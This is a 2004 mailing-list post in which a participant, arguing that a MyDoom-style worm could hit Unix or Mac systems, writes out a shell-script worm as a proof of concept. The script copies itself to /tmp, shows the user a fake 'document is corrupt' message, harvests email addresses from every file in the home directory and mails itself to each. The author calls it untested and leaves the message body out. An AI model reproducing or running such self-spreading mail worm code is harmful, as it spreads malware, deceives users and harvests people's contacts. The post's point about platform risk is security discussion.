MyDoom (was: Test)
bscott at ntisys.com
bscott at ntisys.com
Mon Feb 2 12:27:39 EST 2004
On Mon, 2 Feb 2004, at 10:52am, mkomarinski at wayga.org wrote:
>> The reason this is significant is that there is absolutely no technical
>> reason that this worm could not exist in the Macintosh or Unix worlds.
>
> For now I think it would be technically hard for this to happen.
#!/bin/sh
# MyDoom for Linux proof-of-concept
if [ "$1" -ne "MyDoom" ]; then
# copy and exec ourself in background
cat $0 > /tmp/mydoom.sh
sh /tmp/mydoom.sh &
# divert luser
echo "Document is corrupt. Please ask sender to re-send."
exit
fi
# don't run more then one of ourself
[ -e /tmp/mydoom ] && exit
touch /tmp/mydoom
# harvest email addresses
find "$HOME" -type f -print0 2>/dev/null | \
xargs -0 strings 2>/dev/null \
| grep -Eio '[-.a-z0-9_]+@[-.a-z0-9_]+\.(com|net|org|[a-z][a-z])' \
| sort | uniq > /tmp/mydoom
# send ourselves to everyone
while read MYDOOM ; do
mail -s "Important document" "$MYDOOM" <<EOM
[insert pre-built message body here]
EOM
done < /tmp/mydoom
rm /tmp/mydoom
I didn't take the time to test it, or to pre-build the actual message body
with MIME-encoded attachment, but you get the idea. That should be
reasonably portable to most modern Unix systems; I might have used some
GNU-ish extensions that would break it on older Unixes. It might even run
on a MacOS X system.
This took me 25 minutes, and I am far from an expert programmer.
This is going to happen; it is only a question of when.
--
Ben Scott <bscott at ntisys.com>
| The opinions expressed in this message are those of the author and do |
| not represent the views or policy of any other person or organization. |
| All information is provided without warranty of any kind. |
More information about the gnhlug-discuss
mailing list